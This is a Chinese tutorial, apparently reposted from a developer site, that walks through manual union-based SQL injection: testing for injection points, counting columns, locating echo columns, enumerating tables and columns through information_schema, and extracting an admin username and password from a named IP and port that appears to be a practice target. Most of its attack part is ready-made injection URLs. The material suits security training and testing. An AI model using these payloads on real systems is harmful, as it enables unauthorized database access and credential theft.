内容简介:id=1',在1后面加',页面出错id=1 and 1=1正常,id=1 and 1=2,页面出错id=1 and 1='1'正常,id=1 and 1='1'页面出错
判断注入点
id=1',在1后面加',页面出错
id=1 and 1=1正常,id=1 and 1=2,页面出错
id=1 and 1='1'正常,id=1 and 1='1'页面出错
注:通过构造错误的语句,根据返回结果来判断是否存在注入点
手动注入
- 判断字段数
id =1 order by x,x=1,2,3,4,·······,按第1,2,3,4,······列进行排序 - 判断回显点
union select 1,2,3,4,5,6,7,8,9,10,11 from admin,1,2,3,4...,这里的几个数字纯粹是凑数的, 凑够和union关键字前面的那个表的字段数一样 ,不然没法拼接成一个表。在 sql 注入的时候,在将相应位置替换成你想获得的数据,查询结果后面就会显示出来;效果是from当前字段对应的服务器端的一张表。权限肯定有限制,所以 要看返回的数字才能确定哪一列可以回显到客户端 ,而不是随便哪一列都能利用的。比如服务器返回3,说明第3列可以回显
查询相关内容
- 猜表名
union select 1,2,3,4,5,6,7,8,9,10 from 表名
如果不报错,则该表存在 - 猜字段名->查询字段内容
union select 1,2,3,4,password,6,7,8,9,10 from 表名
如果不报错,则该字段存在
实战
目标链接: http://120.203.13.75 :6815/index.php
-
找注入点:
http://120.203.13.75:6815/index.php?id=1 and 1=2
-
判断字段数
http://120.203.13.75:6815/index.php?id=1 order by 2
1、2均正常显示,3的时候出现异常,则当前表的字段数为2
-
判断回显点
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,2
-
查相关内容(一定要在回显点处查看!)
查数据库名
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,database()
查数据库版本
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,version()
查表名
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
查字段名
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
查出 admin 表里 有 id username password 三个字段
查询字段内容
构造
?id=1 and 1=2 union select 1,username from admin limit 0,1
构造
?id=1 and 1=2 union select 1,password from admin limit 1,1
limit 1,1 没有回显,说明只有一个用户
构造
?id=1 and 1=2 union select 1,password from admin limit 0,1
如此,得到了管理员账号和密码
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- Angular 4 依赖注入教程之二 组件中注入服务
- 服务端注入之Flask框架中服务端模板注入问题
- 服务器端电子表格注入 - 从公式注入到远程代码执行
- SQL注入测试技巧TIP:再从Mysql注入绕过过滤说起
- 手机抓包+注入黑科技HttpCanary——最强大的Android抓包注入工具
- 三, 跨语言微服务框架 - Istio官方示例(自动注入.请求路由.流量控制.故障注入) 原 荐
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Blockchain Basics
Daniel Drescher / Apress / 2017-3-16 / USD 20.99
In 25 concise steps, you will learn the basics of blockchain technology. No mathematical formulas, program code, or computer science jargon are used. No previous knowledge in computer science, mathema......一起来看看 《Blockchain Basics》 这本书的介绍吧!
UNIX 时间戳转换
UNIX 时间戳转换
RGB CMYK 转换工具
RGB CMYK 互转工具